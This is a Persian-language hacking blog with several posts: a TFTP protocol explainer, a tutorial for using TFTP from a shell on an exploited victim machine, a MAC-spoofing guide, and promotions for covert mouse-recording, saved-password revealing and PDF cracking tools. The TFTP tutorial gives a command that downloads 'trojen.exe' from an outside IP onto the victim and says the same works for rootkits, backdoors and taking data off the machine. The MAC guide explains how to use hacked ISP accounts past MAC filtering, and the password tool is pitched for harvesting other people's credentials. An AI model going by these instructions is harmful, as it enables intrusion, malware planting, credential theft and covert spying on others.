loading...
███▓▒░░◄ Hack iran►░░▒▓███
مرتضی(Germany) بازدید : 252 سه شنبه 19 اردیبهشت 1391 نظرات (0)

TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد. جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود . هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و دوباره همان packet گم شده را ارسال می کند. همیشه فرستنده باید آخرین بلاک را در حافظه نگهداری نمایید تا زمانی که پیام ACK را دریافت نماید البته اگر آخرین بلاک از فایل باشد دیگر احتیاجی به صبر کردن و نگهداری بر روی حافظه نیست. 0 mode 0 Filename 01 پیام های TFTP خواندن پیام در خواست 01 نشان دهنده 2 بایت از دستور OPcode network byte که طرف مقابل می گویید این یک READمی باشد. Filename یک رشته null terminated ascii می باشد که نام فایل را به همراه دارد. Mode یک رشته null terminated ascii می باشد که نوع جابجایی را در خود دارد. نوشتن پیام در خواست 0 mode 0 Filename 02 توضیحان این بخش هم مثل بالا می باشد با این تفاوت که 01 برای WRITE می باشد. TFTP Data Packet / Message Data 0 to 512bytes Block # 03 03 2 بایت از دستور OPcode network byte که می گوید در طرف مقبل داده ها قرار دارد. Block # 2 بایت از دستور bytes block number network byte Data 0 to 512bytes همه پکت دیتا ها 512 یایت در خود دارند غیر از آخری جواب Block # 04 04 2 بایت از دستور OPcode network byte که معلوم می کند برای طرف دیگر که ACK می باشد. Block # 2 بایت از دستور block number network byte انواع Error ها 0 errstring errcode 05 05 2 بایت از دستور OPcode network byteکه به طرف مقابل می گویید این یک Error می باشد. Errcode 2 بایت از دستور error code network byte می باشد. Errstring یک رشته null terminated ascii error و error code ها به ترتیب زیرند: 0 - Not defined. 1 - File not found. 2 - Access violation. 3 - Disk full. 4 - Illegal TFTP operation. 5 - Unknown port. 6 - File already exists. 7 - No such user و طریقه های TFTP ترانسفر دو دسته می باشند: 1. netascii که برای انتقالtext فایل ها استفاده شده که البته دو طرف باید برای دریافت و فرستادن به این روش آماده باشند 2. octet که برای انتقال فایل هایbinary مورد استفاده قرار می گیرد.
======
آموزش استفاده از Tftp .

Tftp ) (trivial file transfer Protocolپروتكلي ساده و جمع وجور براي انتقال اطلاعات از طريق شبكه است به وسيله Noel Chiappa طراحي شده است و در RFC 1350 در مورد اين پروتكل بحث شده .

TFTP تنها قابليت خواندن و نوشتن اطلاعات روي سرور راه دور را دارد. براي اين منظور يعني انتقال اطلاعات روي سرور بايد از سرور TFTP كه TFTPd نام دارد استفاده كرد يعني ابتدا روي كامپيوتري كه مي خواهيم به عنوان سرور عمل كند TFTPd را RUN كرده بعد به وسيله TFTP عمليات انتقال و دريافت اطلاعات را انجام دهيم مي توانيد از اين آدرس يك TFTPd دانلود كنيد
http://www.winagents.com/downloads/tftpsetup.exe

خوب حالا شما بايد نحوه كار اين سرور و كلاينت يعني tftp و tftpd را بياموزيد.
ما براي مثال وقتي كه يك كامپيوتر را به وسيلة اكسپلويتي هك مي كنيم يك شل از آن كامپيوتر مي گيريم خوب در اين مرحله قطعا ما تمايل داريم كه يك سري نرم افزار روي سيستم قرباني دانلود كنيم و سطح دسترسي خود را به سيستم قرباني بالا ببريم يا يك سري اطلاعات از كامپيوتر قرباني بر روي سيستم خود دانلود كنيم براي اين منظور بهترين و ساده ترين ابزار همين tftp است كه همراه سيستم عامل نيز وجود دارد و در آدرس %systemroot%/system32/ قرار دارد و شما وقتي كه يك شل گرفته ايد به راحتي مي توانيد ان را اجرا كنيد ولي بايد در ابتدا يك tftpd روي سيستم خود اجرا كرده تا سيستم شما سروري براي اين نرم افزار باشد براي اين منظور اگر همين tftpd كه در اين مقاله لينك دانلودش قرار داده شده است استفاده كنيد بايد مراحل زير را انجام دهيد:
ابتدا Tftpd32.exe را اجرا كنيد(شكل زير):
خوب در اين حال يك ايكون هم در قسمت systry سيستم شما ظاهر خواهد شد و اگر firewall هم داشته باشيد از شما سوال مي كند كه اجازه مي دهيد كه اين نرم افزار روي يك پرت listing شود شما درخواست را پاسخ مثبت دهيد و اين نرم افزار روي پرت 69 به حالت گوش دهنده آماده به كار مي شود ولي بايد شما يك تنظيم ديگر نيز انجام دهيد تا همه چيز آماده شود شما در اين مرحله بايد base directory را نيز براي اين نرم افزار مشخص كنيد.
base directory چيست:
base directory دايركتوري است كه اين نرم افزار به عنوان دايركتوري براي عمليات ارسال و دريافت از ان استفاده مي كند يعني اگر چيزي را دانلود كنيد در اين دايركتوري قرار مي گيرد و اگر چيزي در اين پوشه باشد با ذكر نام آن مي توانيد آن را upload كنيد براي مشخص كردن اين پوشه كه به طور پيش فرض mydocument شما مي باشد بايد دكمه settings را كليك كنيد و در پنجره باز شده(شكل زير

در قسمت بالي پنجره آدرس بيس دايركتوري خود را وارد كنيد و روي دكمه Ok كليك كرده و ديگر همه چيز مهياست براي كار با قسمت كلاينت يعني خود TFTP .

Tftp يك نرم افزار تحت كنسول است يعني حالت متني دارد و در شل اجرا مي شود و شما مي توانيد به راحتي از اين نرم افزار كه همراه كامپيوتر قرباني است براي مقاصد خود استفاده كنيد صورت كلي اين نرم افزار بدين صورت است:
Tftp –I HostName [Get/Put] Source Destination
كه سويچ I ترتيب انقال فايل به صورت باينري رو مي ده (البته من مي گم انتقال فايل دقيقا منظورم كلمه انتقال نيست بلكه فقط يك تصوير از فايل ارسال مي شه مثل دستگاه فكس نه اينكه كل فايل از سرور move بشه روي اون كامپيوتر و ديگر اثري از فايل روي سرور نباشه) اگر هم نوشته نشه فكر مي كنم كه فايل به صورت اكتال انتقال داده مي شه در اين مورد دقيقا مطمئن نيستم.
HostName هم آدرس آي پي كامپيوتر سرور است يعني همون كامپيوتري كه TFTPD روش Run شده get براي هنگامي است كه شما مي خواهيد يك فايل رو بفرستيد براي كامپيوتر قرباني و put هنگامي استفاده ميشه كه بخواهيد يك فايل رو روي كامپيوتر خود دانلود كنيد درست عكس زماني است كه شما روي كامپيوتر خود عمل دانلود و آپلود رو انجام مي دهيد. Source آدرس فايل مورد نظر شما براي عمليات آرسال يا دريافت است Destination هم آدرس مقصد است.
مثال:
Tftp –I 213.176.108.156 get trojen.exe c:trojen.exe
كه اين دستور باعث مي شه كه فايلي به اسم trojen.exe از basedirectory كامپيوتري با ip 213.176.108.156 به درايو c: كامپيوتري كه دستور بالا در اون اجرا شده كپي بشه.
به همين سادگي شما مي تونيد trojen , rootkit , backdoor و هر چيز دلخواه ديگري روي كامپيوتر مورد نظر خود دانلود و يا هر اطلاعاتي كه نياز داريد از آن آپلود كنيد.

مرتضی(Germany) بازدید : 132 شنبه 16 اردیبهشت 1391 نظرات (0)

آموزش تغییر Mac سیستم به راحتی بدون نرم افزار



واسه تعویض Mac سیستم خودتان نیاز به نرم افزار خاصی نیست بصورت دستی می توانید به راحتی تغییرش بدهید .

ابتدا روی Local Area Connection کلیک راست کنید و Propertise را انتخاب کنید :

صفحه که باز شد روی Configure کلیک کنید

و در صفحه بعدی به تب دوم بروید یعنی روی Advanced کلیک کنید حالا از منوی کشویی Property گزینه Network Address انتخاب کنید و بعد تیک Vaule رو بگذارید و در کادر آدرس Mac جدید را تایپ کنید

Mac را بدون علامت دو نقطه ":" ، مثلاً "001A15D371C5" تایپ کنید و در آخر کار هم ok کنید و تمومه به همین سادگی و به همین خوشمزگی .


MAC اصلی سیستم ما و سیستم User هک شده


MaC سیستم خودمان را که با راست کلیک روی Local Area Connection و انتخاب Status و سپس Details متوانیم ببینیم :

معمولاً در سطر سوم جلوی Physical Address هستش .


خب حالا اگر User و Pass از یک ISP دارید (هک کردید یا ...) و آنها هم از MAC F-i-l-t-e-r ing استفاده می کنند ،

شما نمی توانید به اینترنت وصل شوید چرا که باید با همان Mac باشید تا Error 691 اعصابتان را به هم نریزد ، از کجا ؟! .. :


واسه پیدا کردن MAC اصلی صاحب User از طریق لینک IBSNG آن ISP که توی سایت اصلی معمولاً هست به کنترل پنل User وارد شوید

بعد روی گزارش اتصالات کلیک کنید و در آن صفحه همانطور که توی عکس ضمیمه می بینید روی Details کلیک کنید ، آدرس مک نمایان می شود .

آنرا کپی و طبق آموزش بالا سیستم خود را با آن مک بالا بیاورید .


تصاویر پیوست شده                                             download


download


download

مرتضی(Germany) بازدید : 578 شنبه 16 اردیبهشت 1391 نظرات (0)

 

پورت اسکنر پیشرفته چیست

 

پیشرفته اسکنر پورت کوچک، سریع، قوی و آسان برای استفاده از پورت اسکنر برای پلت فرم Win32 است. با استفاده از یک تکنیک


multithread، بنابراین بر ​​روی ماشین های سریع شما می توانید پورت های بسیار سریع اسکن. همچنین شامل شرح پورت های مشترک،


و می تواند اسکن در محدوده بندر از پیش تعریف شده انجام دهد.


         

  لطفا برای دانلود به ادامه ی مطلب بروید                                                                       

______بابک بوتر______ بازدید : 89 جمعه 15 اردیبهشت 1391 نظرات (0)

 

پیش فرض نرم افزار ضبط کارهای انجام شده با موس به صورت مخفی و آشکار Mouse Recorder Pro 2.0.2.0

 




موس معمول ترین وسیله ی کار با کامپیوتر است که هر فرد در هنگام کار با آن از این وسیله برای باز کردن پنجره ها ، اجرا کردن نرم افزار ها ، پخش فیلم و موزیک و ... استفاده می کند. حال فرض کنید شما چند روزی به کامپیوتر شخصی خود دسترسی ندارید و احتمال می دهید که شخصی کامپیوتر شما را روشن کند و به قسمت های مختلف آن سر بزند شما برای اینکه بتوانید مچ طرف مقابل را بگیرید و یا بدانید که او به کدام قسمت های کامپیوتر رفته است نیاز به نرم افزاری دارید که تمام عملیات های انجام شده توسط موس کامپیوتر را به صورت مخفی ظبط کند و نیز فایل ضبط شده را در قسمتی از هارد کامپیوتر ذخیره کند. نرم افزار Mouse Recorder به شما کمک می کند تا مدیریتی کامل و همه جانبه بر روی موس کامپیوتر خود داشته باشید. در واقع شما می توانید این نرم افزار را طوری تنظیم کنید که در هنگام بالا آمدن ویندوز اجرا شود و به صورت مخفی تمام کارهایی که با موس کامپیوتر شما انجام می شود را در یک فایل ویدویی بسیار کم حجم که فقط با خود نرم افزار قابل پخش بوده به همراه صدا ظبط و ذخیره کند. در واقع این نرم افزار را می توان به نوعی دوربین مدار بسته موجود در فروشگاه ها تشبیه کرد که تمامی اتفاقات انجام شده در آن را ضبط می کند. از قابلیت های دیگر این نرم افزار می توان به ساخت فیلم های آموزشی نیز اشاره کرد که شما به کمک موس می توانید طریقه نصب نرم افزاری و یا قسمت های مختلف کار با آن را آموزش دهید و سپس آن را ذخیره کنید.
برخی از امکانات نرم افزار:
- مدیریت کامل بر روی موس کامپیوتر.
- امکان ظبط تمام کاره های انجام شده با موس به همراه صدا.
- قابلیت ذخیره سازی فایل ظبط شده در فرمتی بسیار کم حجم و با کیفیتی بسیار بالا.
- قابلیت ظبط کارهای انجام شده با موس به صورت مخفی.
- امکان پخش فایل ظبط شده فقط توسط خود نرم افزار.
- چسباندن و بریدن قسمتی از فایل تصویری ظبط شده.
- داشتن Hot Key جهت انجام ظبط ، توقف و پخش.
- قابلیت ساخت فیلم های آموزشی.
- سازگار با نسخه های مختلف ویندوز.
- داشتن محیط ساده و کاربر پسند.
- حجم بسیار مناسب.
- و ...

______بابک بوتر______ بازدید : 345 جمعه 15 اردیبهشت 1391 نظرات (0)

 

پیش فرض نرم افزار مشاهده پسوردهای ستاره دار *** ذخيره شده در 40 برنامه مختلف با پرتابل Spotauditor 3.9.2

 


حتمآ همه ی شما در جاهای مختلف دو کلمه ی Username و Password نام کاربری و رمز عبور را دیده اید و همانطور که می دانید در قسمت Password تعدادی کاراکتر که معمولآ در قالب عدد هستند قرار می گیرند و تشکیل یک رمز عبور را می دهند. در اکثر جاهایی که شما کاراکترها را در قسمت Password وارد می کنید رمز عبور به شکل تعدادی ستاره **** در می آید که البته هدف از اینکار آشکار نشدن پسورد شما برای افرادی است که در کنارتان هستند. اما گاهی اوقات نیاز است به دلایل مختلف این پسوردهای ستاره دار قابل رویت شوند. از همین رو امروز در راسخون نرم افزار جالبی را برایتان آماده کرده ایم که قادر است تا پسوردهای ستاره دار را به شما نشان دهد.
شما با کمک نرم افزار Spotauditor به راحتی و تنها با یک کلیک می توانید پسوردهایی را که به شکل ستاره * هستند را ببینید. این نرم افزار قادر است تا پسورد ستاره دار *** ذخيره شده در 40 برنامه مختلف را به شما نشان دهد. طریقه ی کار با نرم افزار بسیار ساده بوده فقط کافیست بر روی آیکون آن کلیک کنید تا اجرا شود و پس از آن با انتخاب گزینه ی Start Audit، نرم افزار تمامی پسوردهای ستاره دار ذخیره شده در برنامه ها مختلف کامپیوتر را به شما نشان می دهد که این برنامه ها شامل 40 نرم افزار:
Internet Explorer, Firefox, Opera, MSN Messenger, Windows Live Messenger 8, Windows Messenger, ICQ, Google Talk, Google Desktop, Trillian, Miranda IM, Camfrog Video Chat, Easy Web Cam, Remote Desktop Protocol (RDP), R&Q, Total Commander ( Windows Commander ), IpSwitch IM server, IMail server, WS_FTP, FileZilla, SmartFTP, Far ftp client, CuteFTP, FlashFXP ftp, SecureFX ftp client, WebDrive, FTP Voyager, AutoFTP, 32bit FTP, FTP Now, FTP Navigator, CoreFTP, CoffeeCup Direct FTP, FFFtp, FTP Control, DeluxeFtp and Internet Download Manager Passwords, VNC, WinProxy, Dial up, RAS, VPN, Outlook passwords and reveals passwords saved in Internet Explorer Auto Complete Fields.
می باشد. البته این نرم افزار را می توان به نوعی نرم افزار هک هم دانست زیرا شما با استفاده از آن به راحتی می توانید در کامپیوتر های اشخاص مختلف پسوردهایی را که آنان در نرم افزارهای نصب شده بر روی کامپیوتر خود وارد کرده اند و به شکل ستاره* ذخیره شده است را مشاهده کنید. همچنین می توانید از این نرم افزار برای تبدیل پسوردهای ستاره دار هم استفاده کنید به طور مثال نرم افزار Yahoo! Messenger را در نظر بگیرید این نرم افزار جز 40 نرم افزار موجود در لیست نمی باشد ولی می توان پسورد ستاره دار ذخیره شده در آن را نیز مشاهده نمود در واقع وقتی شما پسوردی در این نرم افزار وارد می کنید تا قبل خاموش شدن و یا ریست کامپیوتر فرصت دارید تا نرم افزار Spotauditor را اجرا کرده و پسورد ستاره دار ذخیره شده در یاهو مسنجر را ببینید. از دیگر قابلیتهای این نرم افزار می توان به امکان ذخیره سازی پسوردهای بدست آمده در 6 فایل متنی شامل: txt, csv, xls, mdb, html or xml اشاره نمود. نسخه ای را که در اختیارتان قرار دادیم پرتابل بوده و نیازی به نصب ندارد و تنها با کلیک بر روی آیکون برنامه اجرا می شود که شما می توانید با کپی کردن فایل های نرم افزار در فلش مموری خود در صورت نیاز از آن در محل های مختلفی همانند کافی نت ها و سایر مکان ها که امکان نصب نرم افزار وجود ندارد استفاده کنید.
برخی از مزایای این نرم افزار:
- هک و مشاهده پسوردهای ستاره دار *** تنها با یک کلیک.
- امکان مشاهده پسوردهای ستاره دار *** ذخیره شده در 40 برنامه مختلف.
- امکان تبدیل پسورد های ستاره دار *** در برخی از برنامه ها قبل از ریست و خاموش شدن کامپیوتر.
- امکان حذف کوکی های موجود در مروگرهای نصب شده بر روی سیستم.
- امکان حمل با فلش مموری به دلیل Portable بودن و استفاده در مکانهای مختلف.
- امکان حذف فایل های موجود در History و Temporary اینترنت اکسپلور.
- امکان ذخیره سازی پسوردهای بدست آمده در 6 فایل مختلف متنی.
- قابليت بروز رساني نرم افزار از اينترنت.
- امکان چاپ پسوردهای بدست آمده توسط پرینتر.
- اجرا با یک کلیک و بدون نیاز به نصب.
- امکان استفاده کاملآ رایگان از نرم افزار.
- داشتن محيط زيبا و کاربرپسند.
- سازگار با ويندوز هاي مختلف.
- داشتن حجم مناسب.
- کاربرد آسان.
- و ...
توجه!
این نرم افزار توسط آنتی ویروسهای نود32 ، کاسپرسکای ، نورتون و ... اسکن شده که هیچ کدام از آنها نرم افزار را ویروس و یا سایر عوامل مخرب تشخیص نداده اند در نتیجه نرم افزار کاملآ سالم می باشد .

 

 

______بابک بوتر______ بازدید : 448 جمعه 15 اردیبهشت 1391 نظرات (0)

 

باز کردن فایل های PDF رمز دار با Elcomsoft Advanced PDF Password Recovery 5.0 Professional




امروزه در اینترنت می توان بسیاری از کتاب های الکترونیکی را یافت که با فرمت PDF می باشند و به راحتی در اختیار عموم کاربران قرار می گیرند، اما در مواقعی نیز کاربران به فایل های PDF ای برخورد می کنند که محتویات آن ها به وسیله رمزهای عبور که توسط سازنده PDF بر روی آن ها قرار داده شده است حفاظت می شود. در چنین مواقعی کاربران قادر نیستند تا دیگر به اطلاعات موجود و محتویات فایل PDF دسترسی داشته باشند. Advanced PDF Password Recovery نرم افزاری است که بی درنگ قفل سندهای PDF را که محدودیت چاپ و ویرایش و کپی داده در clipboard را دارد باز می کند.

 

درباره ما
سایتی دیگر از تیم بزرگ بکس 021 برای انتقال تجربیات ارزشمندشان دز زمینه های بالا بردن امنیت سیستم های یوزرهای بازدیدکننده عزیز
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    نظرسنجی
    نظرتان در مورد هک ایران چیست
    آمار سایت
  • کل مطالب : 65
  • کل نظرات : 10
  • افراد آنلاین : 2
  • تعداد اعضا : 52
  • آی پی امروز : 6
  • آی پی دیروز : 1
  • بازدید امروز : 7
  • باردید دیروز : 0
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 11
  • بازدید ماه : 8
  • بازدید سال : 721
  • بازدید کلی : 25,366